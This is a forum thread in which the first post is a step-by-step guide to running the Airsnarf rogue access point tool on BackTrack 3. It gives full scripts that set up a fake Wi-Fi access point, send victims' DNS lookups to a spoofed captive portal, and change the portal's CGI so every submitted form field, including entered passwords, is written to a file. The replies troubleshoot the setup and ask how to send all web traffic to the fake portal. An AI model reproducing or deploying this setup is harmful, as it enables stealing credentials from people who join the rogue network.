Page 1 of 2 12 LastLast
Results 1 to 10 of 20

Thread: Airsnarf working on bt3 with atheros card

  1. #1
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default Airsnarf working on bt3 with atheros card

    This guide has been put together from a number of different guides tested on BT3 works great. I am using proxim8470-WD card

    1st boot into backtrack 3

    make dir in /var/www called html
    make a dir in /var/state called dhcp

    download dhcp-3.0.5-i486-2.tgz
    tar -zxvf dhcp-3.0.5-i486-2.tgz
    touch /var/state/dhcp/dhcpd.leases

    next open kwrite and make a file called in /etc/rc.d/rc.dhcpd
    open file put this in there and save it


    #!/bin/sh
    #
    # /etc/rc.d/rc.dhcpd
    #
    # Start/stop/restart the Samba SMB file/print server.
    #
    # To make Samba start automatically at boot, make this
    # file executable: chmod 755 /etc/rc.d/rc.samba
    #

    dhcpd_start() {
    if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
    echo "Starting Dhcp..."
    /usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
    fi
    }

    dhcpd_stop() {
    killall dhcpd
    }

    dhcpd_restart() {
    dhcpd_stop
    sleep 2
    dhcpd_start
    }

    case "$1" in
    'start')
    dhcpd_start
    ;;
    'stop')
    dhcpd_stop
    ;;
    'restart')
    dhcpd_restart
    ;;
    *)
    # Default is "start", for backwards compatibility with previous
    # Slackware versions. This may change to a 'usage' error someday.
    dhcpd_start
    esac


    then create another file in /ect/rc.d/rc.httpd
    open the file put this in there then save it


    #!/bin/sh
    #
    # /etc/rc.d/rc.httpd
    #
    # Start/stop/restart the Apache web server.
    #
    # To make Apache start automatically at boot, make this
    # file executable: chmod 750 /etc/rc.d/rc.httpd
    #
    conffile=/etc/httpd/httpd.conf

    function start() {
    if grep -q "^Include /etc/apache/mod_ssl.conf" $conffile ; then
    /usr/sbin/apachectl startssl
    else
    /usr/sbin/apachectl start
    fi
    }

    function stop() {
    /usr/sbin/apachectl stop
    }

    function restart() {
    /usr/sbin/apachectl restart
    }

    # See how we were called.
    case "$1" in
    start)
    start
    ;;
    stop)
    stop
    ;;
    restart)
    restart
    ;;
    *)
    echo "usage $0 start|stop|restart" ;;
    esac

    chmod 755 /etc/rc.d/rc.httpd
    chmod 755 /etc/rc.d/rc.dhcpd

    goto airsnarf directory /pentest/wireless/airsnarf open airsnarf and replace with this

    #!/bin/bash
    # airsnarf.sh
    # A rogue AP setup utility.

    echo "Airsnarf - A rogue AP setup utility."
    echo "0.2"
    echo "The Shmoo Group"
    echo "------------------------------------"
    # here are some variables you may want to edit
    WWW_ROOT="/var/www/html"
    CGI_ROOT="/var/www/cgi-bin"
    LOCAL_CFG="./cfg"

    # specify another config dir with a command line arg if you want
    if [ $1 ]
    then
    LOCAL_CFG="$1"
    fi

    source $LOCAL_CFG/airsnarf.cfg

    # create the dhcpd.conf
    echo -n "Creating dhcpd.conf..."
    sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
    echo "Done."

    # copy over the www stuff
    echo -n "Building the captive portal..."
    cp $LOCAL_CFG/html/* $WWW_ROOT
    cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
    chmod +x $CGI_ROOT/*
    echo "Done."

    # set our wireless parameters
    echo -n "Setting the wireless parameters..."
    ifconfig $ROGUE_INTERFACE down
    wlanconfig $ROGUE_INTERFACE destroy
    wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
    ifconfig $ROGUE_INTERFACE up
    iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
    echo "Done."

    # set our ip and default route
    echo -n "Setting the ip address and default route..."
    ifconfig $ROGUE_INTERFACE $ROGUE_GW
    route add -net 0.0.0.0 gw $ROGUE_GW
    echo "Done."

    # restart some services
    /usr/sbin/dhcpd -cf /etc/dhcpd.conf
    /usr/sbin/apachectl restart
    #/etc/init.d/sendmail restart

    # set up the firewall to redirect
    echo -n "Setting up firewall to redirect DNS..."
    echo 1 > /proc/sys/net/ipv4/ip_forward
    modprobe iptable_nat
    iptables -F -t nat
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
    --to $ROGUE_GW
    # dammit, I swear this used to work with just an OUTPUT rule...
    iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
    --to $ROGUE_GW
    echo "Done."

    # start the local dns resolver
    echo "Starting local DNS resolver..."
    chmod +x ./bin/airsnarf_dns.pl
    ./bin/airsnarf_dns.pl

    now open cfg file in airsnarf folder and edit airsnarf.cfg
    replace with


    ROGUE_SSID="ap name"
    ROGUE_NET="192.168.1."
    ROGUE_GW="192.168.1.254"
    ROGUE_INTERFACE="ath0"
    #export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE



    Now for saving to a file tmp/airsnarf_pwds.txt

    open the airsnarf-0.2/cfg/cgi bin edit airsnarf.cgi

    comment out(or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);"

    replace with

    open (MYFILE, '>>/tmp/airsnarf_pwds.txt');
    foreach $key (keys(%FORM)) {
    print MYFILE "$key = $FORM{$key}\n";
    print MYFILE "----------------------\n";
    }
    ;

    save file

    now run airsnarf and try to connect you will get it works on screen dont worry
    goto /var/www/html and copy to /var/www/htdocs Try to connect now from windows box ect then check passwords

  2. #2
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Why copy all the files across ???? Just modify

    Code:
    # here are some variables you may want to edit
    WWW_ROOT="/var/www/htdocs"
    CGI_ROOT="/var/www/cgi-bin"
    LOCAL_CFG="./cfg"
    Cheers

  3. #3
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default

    Thanks for the info Dr_GrEeN, I have done that now i should have noticed that lol

  4. #4
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Good tut dapirates. I always loved a lil airsnarfin. Well airsnarfin at my house with my equipment.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  5. #5
    coool
    Guest

    Default

    this topic usefull

    i will test this after

  6. #6
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    Thanks for the info- I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with a RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my atheros chip.

  7. #7
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    bump.....................

  8. #8
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default

    I have made this video Airsnarfing on Backtrack 3 and also uploaded all files needed to rapidshare

    http://dapirates1.blip.tv/#650915

    I hope it comes in handy to some of you.
    My life is a living Hell, Day by Day fixing broken Windows Boxes (will it ever end)

  9. #9
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer. I've been using the rausb0 device through VMWare. Anyone else in the same boat?

  10. #10
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    5

    Default

    This is a fantastic guide, I followed it closely and it took awhile but things eventually worked. I have one query though. How do you make all HTML requests go to the gateway address, I got everything working just like yours and when I connect to the rogue AP I'm not diected to anything, just get blank pages, the only page that works is the rogue AP address. Is there anyway to redirect all HTML requests to the local server. This might be an apache thing, I've never been great with apache

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •